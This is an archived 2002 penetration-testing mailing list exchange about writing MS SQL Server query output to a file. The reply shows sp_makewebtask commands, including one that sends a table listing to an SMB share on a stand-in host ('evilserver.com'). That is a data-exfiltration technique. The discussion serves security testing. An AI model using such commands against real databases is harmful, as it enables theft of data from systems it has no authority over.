Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Penetration Testing: Re: Send output to file in SQL

Re: Send output to file in SQL

From: Kevin Spett <kspett_at_spidynamics.com>
Date: Fri, 15 Mar 2002 14:28:22 -0800

I'm not sure if you meant "stored procedure" when you said "extended
procedure". If you didn't, here's on answer.

sp_makewebtask works great for this. It builds an html table with the output
of your query. It's installed by default without any kind of access
control. It works like this:

    sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'SELECT name FROM
sysobjects WHERE xtype=''U'''
    (I'm pretty sure in SQL Server to use quoted parameters inside of quotes
you double single quotes, not double quotes.)

You can even specify a UNC path for the output file, like this:
    sp_makewebtask '\\www.evilserver.com\publicshare\sqloutput.html',
'SELECT name FROM sysobjects WHERE xtype=''U'''
The directory "publicshare" needs to be a wide open SMB share... if any kind
of authentication challenge is present, the file won't be recieved.

Hope this helps.

Kevin Spett
Web Application Security Ninja
SPI Dynamics, Inc.

----- Original Message -----
From: "Alex Harasic" <aharasic_at_terra.cl>
To: <pen-test_at_securityfocus.com>
Sent: Wednesday, March 13, 2002 9:05 AM
Subject: Send output to file in SQL

>
>
> Hi, I've been looking around for ways to send output
> to a file in a sql query. I know there is one for mySQL
> but not for msSQL.
>
> Anyone knows a way to send the output in a query
> without using extended procedures?
>
>
> Alex S. Harasic
> aharasic_at_terra.cl
>
> -------------------------------------------------------------------------- 

--
> This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/
>
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Received on Mar 17 2002
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]